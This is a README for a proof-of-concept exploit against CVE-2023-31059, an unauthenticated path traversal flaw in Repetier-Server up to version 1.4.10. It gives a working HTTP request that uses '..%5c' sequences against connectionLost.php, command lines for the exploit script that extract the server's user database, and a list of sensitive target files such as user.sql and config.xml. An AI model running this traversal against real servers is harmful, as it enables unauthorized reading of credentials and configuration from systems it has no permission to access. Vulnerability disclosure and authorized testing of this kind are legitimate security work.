# Repetier-Server <= 1.4.10 

**Author:** Mohammed Idrees Banyamer  
**Role:** Security Researcher  
**Country:** Jordan 🇯🇴  

---

## Overview
Proof‑of‑concept exploit for an **unauthenticated remote path traversal / LFI vulnerability** in Repetier‑Server ≤ 1.4.10.

The vulnerability allows arbitrary file read via crafted `..%5c` sequences in the `connectionLost.php` endpoint.

---

## Vulnerability Details

| Field | Value |
|------|------|
Product | Repetier‑Server |
Affected | ≤ 1.4.10 |
CVE | CVE‑2023‑31059 |
Type | Path Traversal / LFI |
Authentication | None |
Vector | Network |
Impact | Arbitrary File Read |
CVSS | 9.8 Critical |

---

## PoC Attack Flow

```mermaid
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A
````

---

## Exploitation Example

```
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
```

---

## Usage

```bash
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20
```

---

## Requirements

```bash
pip install requests
```

---

## High-Value Targets

```
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
```

---

## Disclaimer

This PoC is provided for educational and authorized security testing purposes only.
Use only on systems you own or have explicit permission to test.

---

## Contact

GitHub: [https://github.com/mbanyamer](https://github.com/mbanyamer)
